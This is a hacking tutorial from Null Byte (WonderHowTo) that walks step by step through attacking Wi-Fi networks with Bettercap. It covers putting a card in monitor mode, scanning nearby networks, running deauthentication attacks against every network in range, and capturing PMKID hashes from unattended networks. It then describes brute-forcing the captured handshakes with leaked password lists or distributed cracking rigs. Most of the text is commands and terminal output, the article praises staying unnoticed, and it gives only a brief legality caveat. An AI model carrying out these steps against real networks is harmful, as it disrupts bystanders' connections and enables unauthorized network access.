
How to hack Wi-Fi networks with Bettercap «Null Byte :: WonderHowTo



There are many tools available for Wi-Fi hacking, but few are as integrated and well-rounded as Bettercap. Thanks to an impressively simple interface that works even over SSH, it is easy to access many of the most powerful Wi-Fi attacks available anywhere. To capture handshakes from both attended and unattended Wi-Fi networks, we will use two of Bettercap's modules to help us look for weak Wi-Fi passwords.

Wi-Fi Hacking Frameworks

The idea of organizing tools into useful frameworks is not new, but there are many ways to do it. Frameworks such as Airgeddon contain an incredible number of advanced Wi-Fi hacking tools, but they cannot be used from a command line alone. That is because Airgeddon needs to open new windows for its different utilities, so if you are talking to a Raspberry Pi over SSH, you can forget about launching many Wi-Fi hacking tools.

Bettercap provides access to the tools needed to quickly scan for targets, pick one, and grab a WPA handshake to brute-force. Although we will not work with the WPS recon modules today, you can easily check for weak WPA passwords with our setup. The way Bettercap is organized makes it possible for anyone near a target to search for weak WPA passwords while remaining stealthy and unnoticed.

WPA Hacking with Bettercap

Bettercap has been described as the Swiss Army knife of wireless hacking. To that end, it has many modules for sniffing networks after you have connected to them, as well as other modules that look at Bluetooth devices. The simplest use of Bettercap is to run the scan and recon modules to identify nearby targets to launch attacks against, and then, after collecting the necessary information, try to identify networks with weak passwords.

Our targets, in this case, will be two types of networks: attended and unattended. Attended networks are easier to attack, and a larger number of tools work against them. On an attended network, there are people actively using it to download files, watch Netflix or surf the Internet. We can count on devices joining the network to give us the information we need to crack the password.

Unattended networks are harder to target. Because they have no devices with an active data connection that could be knocked off, these networks have generally been unable to provide the information needed to check for a weak password. With the PMKID approach to cracking WPA passwords, that is no longer the case. The tool is integrated as one of the Wi-Fi hacking modules and makes it even easier to attack them.

Brute-Forcing Power Workarounds

Bettercap does not crack the passwords of the networks it targets itself, but cracking would be impossible without the information Bettercap provides. Once a handshake has been recorded, you must use a brute-forcing tool such as Hydra or Aircrack-ng to try a list of common passwords against the hash you have captured. How fast that goes depends on a few factors.

The first is whether the password used to secure the target network appears in the password list you use. If it does not, the attack will not succeed, so it is essential to use lists of real leaked passwords or custom password generators such as CUPP. If you do not believe that brute-force attacks are still effective, you may be surprised to hear that any eight-character password can be brute-forced in just over two hours.

Another workaround for using a device such as a Raspberry Pi for Wi-Fi hacking is to upload the WPA handshake to a cracking rig or network. Many hackers use networks that distribute the cracking workload across volunteer "worker" computers, allowing the group to crack WPA handshakes that less powerful devices have collected.

If you were to run Bettercap on a Raspberry Pi and then upload the captured handshakes to a distributed WPA cracker, you would be able to crack passwords in minutes. You can also set this yourself if you have a computer with a powerful processor and GPU.

What you need

To follow this guide, you need a wireless network card that you can place in a wireless monitor mode. You can find a list of these in our previous articles about buying WiFi network adapters. Your computer may have an internal card that supports the wireless monitor mode, but you must use Linux to work with it. You can consult our other guide to find out if your existing card works.

You can follow our guide today with Kali Linux on your laptop, a Raspberry Pi with Kali Linux or even Ubuntu with some extra installation. For the best result you must use Kali Linux, because Bettercap is pre-installed.

Step 1: Install Bettercap

If you have Kali Linux installed, you can find Bettercap in the "Sniffing & Spoofing" folder of the "Applications" menu, or via a search.

If you do not have Bettercap, you will find the documentation for the project on the Bettercap website. If you use Kali, you can run apt install bettercap to add it, as shown below. You can then find the tool as described above.

  ~# apt install bettercap

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following package was automatically installed and is no longer required:
  liblinear3
Use 'apt autoremove' to remove it.
The following additional packages will be installed:
  bettercap-caplets
Suggested packages:
  bettercap-ui
The following NEW packages will be installed:
  bettercap bettercap-caplets
0 upgraded, 2 newly installed, 0 to remove and 1854 not upgraded.
Need to get 6,931 kB of archives.
After this operation, 25.8 MB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://archive.linux.duke.edu/kalilinux/kali kali-rolling/main amd64 bettercap amd64 2.26.1-0kali1 [6,821 kB]
Get:2 http://archive.linux.duke.edu/kalilinux/kali kali-rolling/main amd64 bettercap-caplets all 0+git20191009-0kali1 [110 kB]
Fetched 6,931 kB in 3s (2,332 kB/s)
Selecting previously unselected package bettercap.
(Reading database ... 417705 files and directories currently installed.)
Preparing to unpack .../bettercap_2.26.1-0kali1_amd64.deb ...
Unpacking bettercap (2.26.1-0kali1) ...
Selecting previously unselected package bettercap-caplets.
Preparing to unpack .../bettercap-caplets_0+git20191009-0kali1_all.deb ...
Unpacking bettercap-caplets (0+git20191009-0kali1) ...
Setting up bettercap-caplets (0+git20191009-0kali1) ...
Setting up bettercap (2.26.1-0kali1) ...
bettercap.service is a disabled or a static unit not running, not starting it.

If you are not using Kali, you will need to follow the more involved installation instructions for Bettercap. If you are working on a Mac, you can perform network recon, but the modules covered in this article will not work. You can still explore the other functions by installing it with Homebrew using the command brew install bettercap.

Step 2: Start Bettercap

When it is installed, click the Bettercap icon to start it. You should see the following help menu open in a terminal window, although the utility itself does not start.

  Usage of bettercap:
  -autostart string
        Comma separated list of modules to auto start. (default "events.stream")
  -caplet string
        Read commands from this file and execute them in the interactive session.
  -cpu-profile file
        Write cpu profile file.
  -debug
        Print debug messages.
  -env-file string
        Load environment variables from this file if found, set to empty to disable environment persistence.
  -eval string
        Run one or more commands separated by ; in the interactive session, used to set variables via command line.
  -gateway-override string
        Use the provided IP address instead of the default gateway. If not specified or invalid, the default gateway will be used.
  -iface string
        Network interface to bind to, if empty the default interface will be auto selected.
  -mem-profile file
        Write memory profile to file.
  -no-colors
        Disable output color effects.
  -no-history
        Disable interactive session history file.
  -quiet
        Suppress all logs which are not errors.
  -version
        Print the version and exit.

Here we see the arguments with which we can start Bettercap. One of the most useful is -iface, with which we can specify the interface to work with. If we have an external wireless network adapter, we must specify it.

Step 3: connect your network adapter and start

Now we have to put our card in monitor mode. If we are already connected to a Wi-Fi network, Bettercap will start sniffing that network instead, so the monitor mode always comes first.

Look for your card with ifconfig or ip a to find the name of your network adapter. It should be something like wlan0 for your internal adapter and wlan1 for your USB network adapter.

  ~# ifconfig

eth0: flags=4099  mtu 1500
        ether 50:7b:9d:7a:c8:8a  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 38625  bytes 3052647 (2.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 38625  bytes 3052647 (2.9 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163  mtu 1500
        inet 192.168.5.93  netmask 255.255.255.0  broadcast 192.168.5.255
        inet6   prefixlen 64  scopeid 0x20
        ether   txqueuelen 1000  (Ethernet)
        RX packets 451  bytes 119964 (117.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 364  bytes 115672 (112.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan1: flags=4099  mtu 1500
        ether 18:d6:c7:0e:e7:a1  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Take the adapter that is compatible with monitor mode and switch it to monitor mode by opening a terminal window and typing airmon-ng start wlan1 with wlan1 replaced by the name of your network adapter.

  ~# airmon-ng start wlan1

Found 3 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    559 NetworkManager
    621 wpa_supplicant
  14785 dhclient

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k           Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)
phy3    wlan1           ath9k_htc       Atheros Communications, Inc. AR9271 802.11n

                (mac80211 monitor mode vif enabled for [phy3]wlan1 on [phy3]wlan1mon)
                (mac80211 station mode vif disabled for [phy3]wlan1)

You can then run ifconfig or ip a again to check that the monitor interface came up.

  ~# ifconfig

eth0: flags=4099  mtu 1500
        ether 50:7b:9d:7a:c8:8a  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 38645  bytes 3053647 (2.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 38645  bytes 3053647 (2.9 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163  mtu 1500
        inet 192.168.5.93  netmask 255.255.255.0  broadcast 192.168.5.255
        inet6   prefixlen 64  scopeid 0x20
        ether   txqueuelen 1000  (Ethernet)
        RX packets 490  bytes 126996 (124.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 386  bytes 126911 (123.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan1mon: flags=4163  mtu 1500
        unspec 18-D6-C7-0E-E7-A1-30-3A-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 1202  bytes 363761 (355.2 KiB)
        RX errors 0  dropped 1176  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

After confirming that your wireless card is in monitor mode, you can start Bettercap by typing sudo bettercap --iface wlan1mon in a new terminal window, replacing wlan1mon with the name of your monitor-mode interface.

  ~ # sudo bettercap --iface wlan1mon

bettercap v2.24.1 (built for linux amd64 with go1.12.7) [type 'help' for a list of commands]

wlan1 »

As soon as Bettercap is opened, type help for a list of all active modules and commands. In the modules you can see that the Wi-Fi module is not started by default.

  wlan1 » help

           help MODULE : List available commands or show module specific help if no module name is provided.
                active : Show information about active modules.
                  quit : Close the session and exit.
         sleep SECONDS : Sleep for the given amount of seconds.
              get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
        set NAME VALUE : Set the VALUE of variable NAME.
  read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
                 clear : Clear the screen.
        include CAPLET : Load and run this caplet in the current session.
             ! COMMAND : Execute a shell command and print its output.
        alias MAC NAME : Assign an alias to a given endpoint given its MAC address.

Modules

      any.proxy > not running
       api.rest > not running
      arp.spoof > not running
      ble.recon > not running
        caplets > not running
    dhcp6.spoof > not running
      dns.spoof > not running
  events.stream > running
            gps > not running
     http.proxy > not running
    http.server > not running
    https.proxy > not running
   https.server > not running
    mac.changer > not running
   mysql.server > not running
      net.probe > not running
      net.recon > running
      net.sniff > not running
   packet.proxy > not running
       syn.scan > not running
      tcp.proxy > not running
         ticker > not running
         update > not running
           wifi > not running
            wol > not running

Step 4: Scan for nearby networks

Let's start by looking at the commands we can give under the Wi-Fi module. We can view this information by typing help wifi in Bettercap.

  wlan1 » help wifi

wifi (running): A module to monitor and perform wireless attacks on 802.11.

  wifi.recon on : Start 802.11 wireless base stations discovery and channel hopping.
  wifi.recon off : Stop 802.11 wireless base stations discovery and channel hopping.
  wifi.clear : Clear all access points collected by the WiFi discovery module.
  wifi.recon MAC : Set 802.11 base station address to filter for.
  wifi.recon clear : Remove the 802.11 base station filter.
  wifi.deauth BSSID : Start a 802.11 deauth attack, if an access point BSSID is provided, every client will be deauthenticated, otherwise only the selected client. Use 'all', '*' or a broadcast BSSID (ff:ff:ff:ff:ff:ff) to iterate every access point with at least one client and start a deauth attack for each one.
  wifi.assoc BSSID : Send an association request to the selected BSSID in order to receive a RSN PMKID key. Use 'all', '*' or a broadcast BSSID (ff:ff:ff:ff:ff:ff) to iterate for every access point.
  wifi.ap : Inject fake management beacons in order to create a rogue access point.
  wifi.show.wps BSSID : Show WPS information about a given station (use 'all', '*' or a broadcast BSSID for all).
  wifi.show : Show current wireless stations list (default sorting by essid).
  wifi.recon.channel : WiFi channels (comma separated) or 'clear' for channel hopping.

  Parameters

  wifi.ap.bssid : BSSID of the fake access point. (default=)
  wifi.ap.channel : Channel of the fake access point. (default=1)
  wifi.ap.encryption : If true, the fake access point will use WPA2, otherwise it'll result as an open AP. (default=true)
  wifi.ap.ssid : SSID of the fake access point. (default=FreeWiFi)
  wifi.assoc.open : Send association requests to open networks. (default=false)
  wifi.assoc.silent : If true, messages from wifi.assoc will be suppressed. (default=false)
  wifi.assoc.skip : Comma separated list of BSSID to skip while sending association requests. (default=)
  wifi.deauth.open : Send wifi deauth packets to open networks. (default=true)
  wifi.deauth.silent : If true, messages from wifi.deauth will be suppressed. (default=false)
  wifi.deauth.skip : Comma separated list of BSSID to skip while sending deauth packets. (default=)
  wifi.handshakes.file : File path of the pcap file to save handshakes to. (default=~/bettercap-wifi-handshakes.pcap)
  wifi.hop.period : If channel hopping is enabled (empty wifi.recon.channel), this is the time in milliseconds the algorithm will hop on every channel (it'll be doubled if both 2.4 and 5.0 bands are available). (default=250)
  wifi.region : Set the WiFi region to this value before activating the interface. (default=BO)
  wifi.rssi.min : Minimum WiFi signal strength in dBm. (default=-200)
  wifi.show.filter : Defines a regular expression filter for wifi.show (default=)
  wifi.show.limit : Defines limit for wifi.show (default=0)
  wifi.show.sort : Defines sorting field (rssi, bssid, essid, channel, encryption, clients, seen, sent, rcvd) and direction (asc or desc) for wifi.show (default=rssi asc)
  wifi.skip-broken : If true, dot11 packets with an invalid checksum will be skipped. (default=true)
  wifi.source.file : If set, the wifi module will read from this pcap file instead of the hardware interface. (default=)
  wifi.txpower : Set WiFi transmission power to this value before activating the interface. (default=30)

Here we see many options! For our purposes we select the Wi-Fi recon module. Type wifi.recon on in Bettercap to start it. You will start receiving a stream of messages as soon as networks are detected. If this becomes overwhelming, you can type events.stream off to silence the messages.

  wlan1 »wifi.recon on

[23:01:35] [sys.log] [inf] wifi region set to 'BO'
[23:01:35] [sys.log] [inf] wifi interface wlan1 txpower set to 30
[23:01:35] [sys.log] [inf] wifi started (min rssi: -200 dBm)
wlan1 » [23:01:35] [sys.log] [inf] wifi channel hopper started
wlan1 »[23:01:35] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:35] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:35] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:36] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:36] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:36] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:36] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:37] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:37] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:37] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:37] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:38] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:38] [wifi.client.new]   new station ███████████████████████████████████████████ █████████████████
wlan1 »[23:01:38] [wifi.client.new]   new station ███████████████████████████████████████████ █████████████████
wlan1 »[23:01:39] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:39] [wifi.client.new]   new station ███████████████████████████████████████████ █████████████████
wlan1 »[23:01:39] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:41] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:41] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:41] [wifi.client.new]   new station ███████████████████████████████████████████ █████████████████
wlan1 »[23:01:42] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:42] [wifi.client.new]   new station ███████████████████████████████████████████ █████████████████
wlan1 »[23:01:42] [wifi.client.new]   new station ███████████████████████████████████████████ █████████████████
wlan1 »[23:01:42] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:42] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:43] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:52] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:52] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:52] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:53] [wifi.client.new]   new station ███████████████████████████████████████████ █████████████████ 

Step 5: Identify targets

Type wifi.show to display a list of the networks detected so far.

  wlan1 » wifi.show

+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| RSSI ▴  | BSSID             | SSID                          | Encryption       | WPS | Ch | Clients | Sent   | Recvd  | Seen     |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| -55 dBm | ██:██:██:██:██:██ |                               | WPA2 (TKIP, PSK) |     | 6  |         |        |        | 23:01:35 |
| -57 dBm | ██:██:██:██:██:██ | █████████████                 | OPEN             |     | 6  | 1       | 400 B  | 66 B   | 23:01:36 |
| -63 dBm | ██:██:██:██:██:██ | ██████                        | WPA2 (CCMP, PSK) |     | 11 |         |        |        | 23:01:36 |
| -64 dBm | ██:██:██:██:██:██ | ██████████                    | WPA2 (TKIP, PSK) | 2.0 | 5  | 1       | 7.1 kB | 128 B  | 23:01:37 |
| -66 dBm | ██:██:██:██:██:██ | ████████████████              | WPA (TKIP, PSK)  |     | 1  |         |        |        | 23:01:39 |
| -71 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, PSK) |     | 1  |         |        |        | 23:01:35 |
| -72 dBm | ██:██:██:██:██:██ | ████████████████████████████  | WPA2 (CCMP, PSK) |     | 6  |         |        |        | 23:01:35 |
| -81 dBm | ██:██:██:██:██:██ | ████████████████              | OPEN             |     | 11 |         |        |        | 23:01:43 |
| -82 dBm | ██:██:██:██:██:██ | ████████████████████████      | WPA2 (CCMP, PSK) |     | 7  |         |        |        | 23:01:43 |
| -82 dBm | ██:██:██:██:██:██ |                               | WPA2 (CCMP, PSK) | 2.0 | 6  |         | 3.9 kB |        | 23:01:39 |
| -86 dBm | ██:██:██:██:██:██ | ████████████████              | OPEN             |     | 1  | 1       |        | 177 B  | 23:01:35 |
| -86 dBm | ██:██:██:██:██:██ |                               | WPA2 (CCMP, MGT) |     | 1  |         |        |        | 23:01:38 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, PSK) |     | 6  |         |        |        | 23:01:38 |
| -86 dBm | ██:██:██:██:██:██ | ██████████████                | WPA2 (CCMP, PSK) |     | 6  | 1       | 670 B  | 384 B  | 23:01:39 |
| -86 dBm | ██:██:██:██:██:██ |                               | WPA2 (CCMP, MGT) |     | 6  |         |        |        | 23:01:39 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, MGT) |     | 6  |         |        |        | 23:01:37 |
| -87 dBm | ██:██:██:██:██:██ | █████████████████████████████ | WPA2 (CCMP, PSK) | 2.0 | 8  |         |        |        | 23:01:36 |
| -87 dBm | ██:██:██:██:██:██ |                               | WPA2 (CCMP, PSK) |     | 6  |         | 759 B  |        | 23:01:44 |
| -87 dBm | ██:██:██:██:██:██ | ████████████████████          | OPEN             |     | 6  | 1       | 228 B  | 1.2 kB | 23:01:43 |
| -88 dBm | ██:██:██:██:██:██ | ███████████████████████████   | WPA2 (CCMP, PSK) | 2.0 | 6  |         |        |        | 23:01:44 |
| -88 dBm | ██:██:██:██:██:██ | ██████████████████            | OPEN             |     | 8  |         |        |        | 23:01:41 |
| -88 dBm | ██:██:██:██:██:██ | ███████████████████████████   | WPA2 (CCMP, PSK) | 2.0 | 6  |         |        |        | 23:01:41 |
| -90 dBm | ██:██:██:██:██:██ |                               | WPA2 (CCMP, MGT) |     | 6  |         |        |        | 23:01:41 |
| -91 dBm | ██:██:██:██:██:██ | ██████████                    | WPA2 (TKIP, PSK) |     | 11 |         |        |        | 23:01:41 |
| -92 dBm | ██:██:██:██:██:██ | ██                            | WPA2 (CCMP, PSK) | 2.0 | 11 |         |        |        | 23:01:35 |
| -92 dBm | ██:██:██:██:██:██ |                               | OPEN             |     | 6  |         |        |        | 23:01:37 |
| -92 dBm | ██:██:██:██:██:██ | ████████                      | WPA2 (TKIP, PSK) |     | 11 |         |        |        | 23:01:37 |
| -94 dBm | ██:██:██:██:██:██ | █████████████████████████     | WPA2 (CCMP, PSK) |     | 11 |         |        |        | 23:01:37 |
| -94 dBm | ██:██:██:██:██:██ | ██████████████████████████    | WPA2 (CCMP, PSK) | 2.0 | 6  |         |        |        | 23:01:42 |
| -95 dBm | ██:██:██:██:██:██ | █████████████████             | WPA2 (CCMP, PSK) |     | 11 |         |        |        | 23:01:41 |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+

wlan1mon (ch. 12) / ↑ 0 B / ↓ 1.5 MB / 6556 pkts

Wow, we can see a lot of information about the wireless environment around us, such as which networks are the strongest and what kinds of encryption they use.

You will notice that all the networks are shown in green (you cannot see it in this article, but you will see green on your end). If a network turns red (again, not in the box above, but you will see it on your side), it means we have captured a handshake for it and can try to brute-force it. Let's start with a tried-and-true method first, and use the deauth module to try to get handshakes.

Step 6: Attack with a Deauth Attack

To start the deauth module, you'll type wifi.deauth and then the MAC address of the network you want to attack. If you want to attack every network you've found, you can just type all or *, but be aware this can be illegal if you're interfering with someone's Wi-Fi that did not permit you to test this tool on it.

wlan1  » wifi.deauth all

wlan1  » [23:02:53] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1  » [23:02:54] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1  » [23:02:55] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1  » [23:02:55] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:02:56] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1  » [23:02:57] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:02:57] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1  » [23:02:58] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1  » [23:02:59] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1  » [23:03:00] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1  » [23:03:01] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:01] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:02] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:02] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1  » [23:03:03] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:04] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:04] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:05] [wifi.client.handshake] capturing ████████████████████████████████████████████████████████████
wlan1  » [23:03:05] [wifi.client.handshake] capturing ████████████████████████████████████████████████████████████
wlan1  » [23:03:05] [wifi.client.handshake] capturing ████████████████████████████████████████████████████████████
wlan1  » [23:03:06] [wifi.client.handshake] capturing ████████████████████████████████████████████████████████████
wlan1  » [23:03:06] [wifi.client.handshake] capturing ████████████████████████████████████████████████████████████
wlan1  » [23:03:06] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1  » [23:03:06] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:06] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:06] [wifi.client.probe] station ████████████████████████████████████████████████████████████

After allowing the tool to run for a minute or so, we can see the results by typing wifi.show and seeing if any results have come in red. In our example, we can see that we've managed to grab handshakes for three of the nearby Wi-Fi networks we've detected.

wlan1  » wifi.show

+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| RSSI ▴  | BSSID       | SSID              | Encryption    | WPS | Ch | Clients | Sent  | Recvd  | Seen   |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| -55 dBm | ██:██:██:██:██:██ |                       | WPA2 (CCMP, PSK) | | 6  | 5       | 12 kB  | | 23:03:06 |
| -57 dBm | ██:██:██:██:██:██ | █████████████                 | WPA2 (CCMP, PSK) | | 6  | 1       | 6.5 kB | 66 B   | 23:03:04 |
| -63 dBm | ██:██:██:██:██:██ | ██████                        | WPA2 (CCMP, PSK) | | 11 | 2       | 1.2 kB | | 23:03:04 |
| -64 dBm | ██:██:██:██:██:██ | ██████████                    | WPA2 (CCMP, PSK) | 2.0 | 5  | 2       | 7.1 kB | 128 B  | 23:03:02 |
| -71 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, PSK) |     | 1  | 2       | 353 B  |        | 23:03:05 |
| -72 dBm | ██:██:██:██:██:██ | ████████████████████████████  | WPA2 (CCMP, PSK) |     | 6  | 1       | 4.9 kB |        | 23:03:06 |
| -81 dBm | ██:██:██:██:██:██ | ████████████████              | WPA2 (CCMP, PSK) |     | 11 |         |        |        | 23:03:06 |
| -82 dBm | ██:██:██:██:██:██ | ████████████████████████      | WPA2 (CCMP, PSK) |     | 7  |         |        |        | 23:03:07 |
| -86 dBm | ██:██:██:██:██:██ |                               | WPA2 (CCMP, PSK) |     | 1  |         |        |        | 23:03:01 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, PSK) |     | 6  |         |        |        | 23:03:02 |
| -86 dBm | ██:██:██:██:██:██ | ██████████████                | WPA2 (CCMP, PSK) |     | 6  |         | 670 B  | 384 B  | 23:03:02 |
| -86 dBm | ██:██:██:██:██:██ |                               | WPA2 (CCMP, MGT) |     | 6  |         |        |        | 23:03:01 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, MGT) |     | 6  |         |        |        | 23:03:01 |
| -87 dBm | ██:██:██:██:██:██ |                               | WPA2 (CCMP, PSK) |     | 6  |         | 759 B  |        | 23:03:02 |
| -87 dBm | ██:██:██:██:██:██ | ████████████████████          | WPA2 (CCMP, PSK) |     | 6  |         | 228 B  | 1.2 kB | 23:03:04 |
| -88 dBm | ██:██:██:██:██:██ | ███████████████████████████   | WPA2 (CCMP, PSK) | 2.0 | 6  |         |        |        | 23:03:04 |
| -88 dBm | ██:██:██:██:██:██ | ██████████████████            | WPA2 (CCMP, PSK) |     | 8  |         |        |        | 23:03:04 |
| -90 dBm | ██:██:██:██:██:██ |                               | WPA2 (CCMP, PSK) |     | 6  |         |        |        | 23:03:06 |
| -91 dBm | ██:██:██:██:██:██ | ██████████                    | WPA2 (TKIP, PSK) |     | 11 |         | 1.7 kB |        | 23:03:04 |
| -92 dBm | ██:██:██:██:██:██ | ██                            | WPA2 (CCMP, PSK) | 2.0 | 11 |         |        |        | 23:03:08 |
| -92 dBm | ██:██:██:██:██:██ | ████████                      | WPA2 (TKIP, PSK) |     | 11 |         |        |        | 23:03:08 |
| -94 dBm | ██:██:██:██:██:██ | ██████████████████████████    | WPA2 (CCMP, PSK) | 2.0 | 6  |         |        |        | 23:03:09 |
| -95 dBm | ██:██:██:██:██:██ | █████████████████             | WPA2 (CCMP, PSK) |     | 11 |         |        |        | 23:03:09 |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+

wlan1mon (ch. 12) / ↑ 73 kB / ↓ 8.9 MB / 28100 pkts / 2 handshakes

This is a good result, but many of these networks are unattended, as the Clients column shows. Notice that this method captured nothing from any network without clients attached: it only works when a client reconnects and performs a fresh handshake. To cover these unattended networks, we'll need to run the second module. To control where captured handshakes are saved, use set wifi.handshakes.file followed by the path of the pcap file you want them written to (by default they go to bettercap-wifi-handshakes.pcap in the home directory, which is why the output below shows /root/bettercap-wifi-handshakes.pcap).

wlan1  » set wifi.handshakes.file '/desired/folder/handshakes.pcap'

Step 7: Run the PMKID Attack

To begin our attack against unattended networks, we'll type wifi.assoc followed by the MAC address of the access point we want to target. To run it against every network we've detected, type all or * instead. If you turned the event stream off earlier with events.stream off but want to watch the results of this module roll in, re-enable it with events.stream on and look for lines like the following.

wlan1  » wifi.assoc all

wlan1  » [23:04:58] [wifi.client.handshake] captured ██:██:██:██:██:██ -> ATT286GPs5 (██:██:██:██:██:██) RSN PMKID to /root/bettercap-wifi-handshakes.pcap
wlan1  » [23:04:58] [wifi.client.handshake] captured ██:██:██:██:██:██ -> ATT286GPs5 (██:██:██:██:██:██) RSN PMKID to /root/bettercap-wifi-handshakes.pcap
wlan1  » [23:04:58] [wifi.client.handshake] captured ██:██:██:██:██:██ -> ATT286GPs5 (██:██:██:██:██:██) RSN PMKID to /root/bettercap-wifi-handshakes.pcap
wlan1  » [23:04:58] [wifi.client.handshake] captured ██:██:██:██:██:██ -> ATT286GPs5 (██:██:██:██:██:██) RSN PMKID to /root/bettercap-wifi-handshakes.pcap
